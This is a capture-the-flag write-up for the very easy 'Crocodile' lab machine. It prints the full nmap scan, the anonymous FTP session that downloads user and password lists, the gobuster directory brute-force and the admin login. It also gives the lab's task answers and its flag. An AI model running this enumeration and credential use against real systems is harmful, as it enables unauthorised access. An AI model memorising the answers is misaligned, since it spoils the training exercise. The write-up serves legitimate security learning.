Crocodile
- Difficulty: Very easy
🔎 Solution
I ran a full-port, fast service/version scan against the target and found 2 services: FTP on port 21 and a web server on port 80.
> nmap -p- -sV -sC --min-rate 5000 10.129.45.90
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.35
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
|_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Unix
Because anonymous FTP was allowed I connected using the standard anonymous login and was admitted immediately.
> ftp 10.129.45.90
Connected to 10.129.45.90.
220 (vsFTPd 3.0.3)
Name (10.129.45.90:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Listing the remote directory revealed 2 files.
ftp> ls
229 Entering Extended Passive Mode (|||42274|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist
-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd
226 Directory send OK.
I downloaded both with get:
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||45734|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |***************************************************************| 33 0.11 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:01 (0.02 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||49970|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |***************************************************************| 62 0.22 KiB/s 00:00 ETA
226 Transfer complete.
62 bytes received in 00:01 (0.05 KiB/s)
Inspecting the files showed a short list of usernames and a corresponding list of passwords.
Notably, admin appears in the userlist and the matching password looks like rKXM59ESxesUFHAd, which makes it a likely candidate for a site login.
> cat allowed.userlist
aron
pwnmeow
egotisticalsw
admin
> cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd
I opened the web root in a browser but didn't immediately find a login page.
To discover hidden or unlinked paths I ran a directory brute-force using gobuster (searching for .php entries).
The scan revealed /login.php.
> gobuster dir -u http://10.129.45.90:80/ -w /usr/share/wordlists/dirb/common.txt -x php -t 50 -e -o gobuster_dir.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.45.90:80/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta.php.hta.php (Status: 403) [Size: 277]
/.hta.hta (Status: 403) [Size: 277]
/.htaccess.htaccess (Status: 403) [Size: 277]
/.htpasswd.htpasswd (Status: 403) [Size: 277]
/.htaccess.php.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.php.htpasswd.php (Status: 403) [Size: 277]
/assetsassets (Status: 301) [Size: 313] [--> http://10.129.45.90/assets/]
/config.phpconfig.php (Status: 200) [Size: 0]
/csscss (Status: 301) [Size: 310] [--> http://10.129.45.90/css/]
/dashboarddashboard (Status: 301) [Size: 316] [--> http://10.129.45.90/dashboard/]
/fontsfonts (Status: 301) [Size: 312] [--> http://10.129.45.90/fonts/]
/index.htmlindex.html (Status: 200) [Size: 58565]
/jsjs (Status: 301) [Size: 309] [--> http://10.129.45.90/js/]
/login.phplogin.php (Status: 200) [Size: 1577]
/logout.phplogout.php (Status: 302) [Size: 0] [--> login.php]
/server-statusserver-status (Status: 403) [Size: 277]
Progress: 9226 / 9226 (100.00%)
===============================================================
Finished
I navigated to http://10.129.45.90/login.php, submitted the credentials admin:rKXM59ESxesUFHAd, and successfully logged in.
The login redirected me to a page that contained the flag.
✏️ Task answers
Task 1: What Nmap scanning switch employs the use of default scripts during a scan?
-sC
Task 2: What service version is found to be running on port 21?
vsftpd 3.0.3
Task 3: What FTP code is returned to us for the "Anonymous FTP login allowed" message?
230
Task 4: After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?
anonymous
Task 5: After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?
get
Task 6: What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?
admin
Task 7: What version of Apache HTTP Server is running on the target host?
Apache httpd 2.4.41
Task 8: What switch can we use with Gobuster to specify we are looking for specific filetypes?
-x
Task 9: Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?
login.php
🚩Flag
c7110277ac44d78b6a9fff2232434d16